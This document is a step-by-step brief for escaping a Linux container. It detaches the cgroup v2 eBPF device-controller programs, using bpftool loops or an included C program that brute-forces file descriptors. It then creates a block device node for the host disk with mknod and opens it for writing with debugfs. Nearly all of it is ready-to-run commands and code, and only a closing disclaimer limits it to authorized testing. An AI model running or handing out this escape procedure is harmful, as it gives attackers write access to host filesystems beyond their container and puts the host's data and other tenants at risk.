This technical brief details the implementation of a Cgroup v2 eBPF device controller bypass. This method leverages the bpf() system call to detach the security programs governing device access.
First, locate the specific Cgroup v2 mount point for the current process. This is the filesystem target from which we will detach the eBPF programs.
# Locate the cgroup2 mount point
export CGROUP_V2_PATH=$(mount -t cgroup2 | awk '{print $3}')
# Identify the specific slice/ID for the current container
export MY_CGROUP=$(cat /proc/self/cgroup | cut -d/ -f3-)
export TARGET_PATH="$CGROUP_V2_PATH/$MY_CGROUP"
If bpftool is available, the bypass can be automated by iterating through all loaded eBPF programs and attempting a detach on the device hook.
# List all eBPF programs to find IDs
# Look for programs of type 'cgroup_device'
bpftool prog show
# Attempt to detach ALL programs from the target cgroup
# This mimics the 'blind detach' logic in the Go source
for PROG_ID in $(bpftool prog show | grep 'cgroup_device' | awk -F: '{print $1}'); do
bpftool cgroup detach "$TARGET_PATH" device id "$PROG_ID"
done
If bpftool is missing, the bypass requires a small C-wrapper or python script to invoke the bpf() syscall directly using the following parameters:
| Parameter | Value | Description |
|---|---|---|
| Command | BPF_PROG_DETACH (9) |
The operation to perform. |
| Target FD | open(TARGET_PATH) |
File descriptor of the cgroup directory. |
| Attach Type | BPF_CGROUP_DEVICE (6) |
The specific controller we are bypassing. |
Once the programs are detached, the kernel will no longer block mknod. We target the host's physical disk (typically major 8).
# 1. Identify the host root partition major/minor
# Example: 8 1 (sda1)
cat /proc/partitions
# 2. Create the device node (this would fail before the detach)
mknod ./host_root b 8 1
# 3. Access the host filesystem
# Use debugfs to avoid the 'mount' syscall which might be blocked by other masks
debugfs -w ./host_root
- Required Privileges: The process must possess
CAP_SYS_ADMINorCAP_BPFto manipulate eBPF attachments. - Kernel Version: Requires Linux 4.15+ (introduction of cgroup-bpf).
- Cgroup Version: Only applicable to Cgroup v2 (
unifiedhierarchy).
| Action | Expected Result (Success) | Expected Result (Fail) |
|---|---|---|
bpftool cgroup detach |
Return code 0 |
Operation not permitted |
mknod ... b 8 1 |
File created | Operation not permitted |
debugfs |
Access to ls / on host |
Bad magic number / Permission denied |
This is a simplified, technical implementation of the Cgroup v2 eBPF bypass using a minimal C program. This is used when bpftool is unavailable.
This code performs the BPF_PROG_DETACH syscall, which is the programmatic equivalent of the Go code's core logic.
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
int main(int argc, char *argv[]) {
if (argc < 3) {
printf("Usage: %s <cgroup_path> <bpf_prog_fd>\n", argv[0]);
return 1;
}
int cg_fd = open(argv[1], O_RDONLY);
int bpf_fd = atoi(argv[2]);
union bpf_attr attr = {
.target_fd = cg_fd,
.attach_bpf_fd = bpf_fd,
.attach_type = BPF_CGROUP_DEVICE
};
if (syscall(SYS_bpf, BPF_PROG_DETACH, &attr, sizeof(attr)) == 0) {
printf("Success: Detached FD %d from %s\n", bpf_fd, argv[1]);
} else {
perror("Bypass failed");
}
close(cg_fd);
return 0;
}A. Compile the bypass tool:
gcc bypass.c -o bypass
B. Find the container's Cgroup path:
export CG_PATH="/sys/fs/cgroup$(cat /proc/self/cgroup | cut -d: -f3)"
C. Brute-force detach:
Since we cannot easily list BPF FDs without bpftool, we attempt to detach all likely File Descriptors (standard BPF FDs start from 3 onwards).
for fd in {3..20}; do
./bypass "$CG_PATH" $fd
done
D. Create the Host Device Node:
Once the eBPF filter is detached, the device controller no longer blocks mknod.
# Create node for /dev/sda1 (Major 8, Minor 1)
mknod ./host_disk b 8 1
# Access host files directly
debugfs -w ./host_disk
For Educational and Authorized Security Testing Only.
This information is intended for security researchers and system administrators to understand and mitigate container escape vectors. Accessing or modifying systems without explicit authorization is illegal. The techniques described involve low-level kernel interactions that can cause system instability or data loss. Use at your own risk.